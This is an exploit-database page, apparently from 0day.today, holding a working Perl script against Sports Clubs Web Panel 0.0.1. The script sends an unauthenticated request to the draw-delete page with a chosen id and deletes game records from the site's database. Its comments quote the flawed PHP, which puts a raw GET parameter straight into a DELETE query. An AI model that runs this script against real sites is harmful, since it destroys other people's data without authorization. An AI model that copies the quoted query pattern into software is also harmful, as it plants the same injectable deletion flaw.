[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Author
ka0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3663
Category
web applications
Date add
12-09-2008
Platform
unsorted
=======================================================
Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
=======================================================



#!/usr/bin/perl -W

# Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
# File affected: include/draw-delete.php (id)

# Vuln Code:

# 06:  $did = $_GET['id'];
# 08:  mysql_query("DELETE FROM draw WHERE did='$did'");

# D.O.M Labs - Security Researchers
#

# ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3


use LWP::UserAgent;

my $host = $ARGV[0];
my $did = $ARGV[1];

die &_USAGE unless $ARGV[1];

sub _USAGE
{
	die "
	- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
	- by ka0x (www.domlabs.org)
	
	usage: ./$0 <host> <valid_game_id>
	ex: ./$0 http://localhost/sportspanel 2
	";
}

my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");

my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content;

if ($res->is_success){
	if($con =~ /$did/){
		print "[+] The Game \"$did\" has been deleted from the database!\n";
	}
}

else{
	print "[-] Exploit Failed!";
}

__END__



#  0day.today [2024-12-25]  #